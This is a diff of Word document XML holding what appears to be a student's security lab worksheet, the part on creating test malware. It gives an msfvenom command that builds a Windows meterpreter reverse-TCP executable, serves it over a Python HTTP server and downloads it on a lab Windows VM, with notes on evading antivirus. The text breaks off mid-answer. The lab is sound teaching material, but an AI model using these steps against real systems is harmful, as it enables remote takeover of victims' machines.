+          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="24BF2415" wp14:editId="4F3E13CA">
+            <wp:extent cx="5934075" cy="3686175"/>
+            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
+            <wp:docPr id="318747876" name="Picture 8"/>
+            <wp:cNvGraphicFramePr>
+              <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+            </wp:cNvGraphicFramePr>
+            <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                  <pic:nvPicPr>
+                    <pic:cNvPr id="0" name="Picture 12"/>
+                    <pic:cNvPicPr>
+                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
+                    </pic:cNvPicPr>
+                  </pic:nvPicPr>
+                  <pic:blipFill>
+                    <a:blip r:embed="rId23" cstate="print">
+                      <a:extLst>
+                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
+                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
+                        </a:ext>
+                      </a:extLst>
+                    </a:blip>
+                    <a:srcRect/>
+                    <a:stretch>
+                      <a:fillRect/>
+                    </a:stretch>
+                  </pic:blipFill>
+                  <pic:spPr bwMode="auto">
+                    <a:xfrm>
+                      <a:off x="0" y="0"/>
+                      <a:ext cx="5934075" cy="3686175"/>
+                    </a:xfrm>
+                    <a:prstGeom prst="rect">
+                      <a:avLst/>
+                    </a:prstGeom>
+                    <a:noFill/>
+                    <a:ln>
+                      <a:noFill/>
+                    </a:ln>
+                  </pic:spPr>
+                </pic:pic>
+              </a:graphicData>
+            </a:graphic>
+          </wp:inline>
+        </w:drawing>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===============================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Part 4: Create a simple Malware</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>In this section, we will generate a simple malware attack to make sure that our environment is ready.</w:t>
+      </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Navigate to the “malware” folder (while still in your Windows VM), and download the test malware. Does it work? If not, why? Document any steps required to enable the download.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===========================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>STEPS TAKEN:</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="720"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>===========================================</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="Normal"/>
-        <w:spacing w:line="360" w:lineRule="auto"/>
-        <w:ind w:left="0" w:hanging="0"/>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Open a terminal in your Kali VM, and create a new directory named ‘malware</w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>’ .</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
     </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-        <w:t>Take a snapshot of your VM if your hypervisor has that capability, and if so, please include the screenshot below.</w:t>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Type:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> -p windows/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>meterpreter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>/</w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>reverse_tcp</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> LHOST=10.0.0.1 -f exe &gt; malware/test-malware.exe</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">You can safely ignore the warnings. This command creates an .exe file named ‘test-malware’ with a virus.  The ‘-p’ flag specifies the payload that the malware will deliver to the </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>victim;</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> in this case, a reverse TCP shell.  </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>The `-f’</w:t>
+      </w:r>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> flag specifies the file type created.  The `LHOST’ flag specifies, in this </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:lastRenderedPageBreak/>
+        <w:t>case, the IP address of the machine the payload will try to connect *to* when serving the reverse shell from the victim machine.</w:t>
       </w:r>
     </w:p>
     <w:p>
       <w:pPr>
         <w:numPr>
           <w:ilvl w:val="0"/>
-          <w:numId w:val="4"/>
+          <w:numId w:val="6"/>
         </w:numPr>
         <w:spacing w:line="360" w:lineRule="auto"/>
         <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
-          <w:sz w:val="24"/>
-          <w:szCs w:val="24"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Verdana" w:hAnsi="Verdana" w:eastAsia="Verdana" w:cs="Verdana"/>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Briefly summarize what </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> is and what it is used for:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Msfvenom</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> combines the functionality of </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msfpayload</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> and </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>msfencode</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> into a single tool within the Metasploit Framework allowing us to generate custom payloads for exploitation purposes. Functionalities such as creating payloads (-p)</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> like reverse shells, encoding payloads to evade antivirus detection (-e), and generating payloads depending on computer architecture and operating system (-a, --arch, --platform) are provided.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Still on the Kali VM, type:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">python3 –m </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http.server</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:proofErr w:type="gramEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> 8000</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:tab/>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>This command starts an HTTP server with the current directory as its root.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:numPr>
+          <w:ilvl w:val="0"/>
+          <w:numId w:val="6"/>
+        </w:numPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Go to your Windows VM, open a browser, and type </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>http://10.0.0.1:8000</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Can you explain what you see?</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>===========================================</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:line="360" w:lineRule="auto"/>
+        <w:ind w:left="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">The directory the server is running </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>within on</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> the Kali VM can be seen</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> as the default message for the server</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">. This is possible as both our Kali VM and Windows VM are connected to an Internal Network </w:t>
+      </w:r>
+      <w:proofErr w:type="gramStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Verdana" w:eastAsia="Verdana" w:hAnsi="Verdana" w:cs="Verdana"/>
+          <w:sz w:val="24"/>
